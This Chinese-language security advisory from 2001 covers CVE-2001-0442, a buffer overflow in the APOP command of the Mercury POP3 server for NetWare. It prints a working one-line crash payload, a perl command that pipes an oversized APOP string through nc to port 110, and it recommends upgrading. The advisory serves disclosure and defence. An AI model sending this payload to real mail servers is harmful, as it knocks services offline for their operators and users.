安全研究
安全漏洞
Mercury的NetWare版本存在缓冲区溢出漏洞
发布日期:2001-04-29
更新日期:2001-04-29
受影响系统:David Harris Mercury/NLM 1.47
David Harris Mercury/NLM 1.46
David Harris Mercury/NLM 1.45
不受影响系统:David Harris Mercury/NLM 1.48
描述:
BUGTRAQ ID: 2641
CVE(CAN) ID:
CVE-2001-0442
Mercury MTA是一个用于Novell NetWare和Windows NT的邮件传输代理(Mail-Transfer Agent,简称MTA)。Novell平台上的Mercury POP3服务器的v1.48之前的版本存在一个缓冲区溢出漏洞,这是由于其在处理APOP认证命令时未对字符串进行充分的检查。
由于溢出发生在认证命令分析器中,所以未经认证的远程用户可以引发这种溢出。目前尚不清楚是否可以通过溢出来执行任意代码,但是已有概念证明式的代码可以击溃NetWare服务器,需要重启才可恢复正常。
<* 来源:Przemyslaw Frasunek (
venglin@freebsd.lublin.pl)*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面的命令将使运行有Mercury MTA的名为mercury_host的主机崩溃:
perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc mercury_host 110
建议:
升级到v1.48:
http://www.pmail.com/downloads.htm浏览次数:4206
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |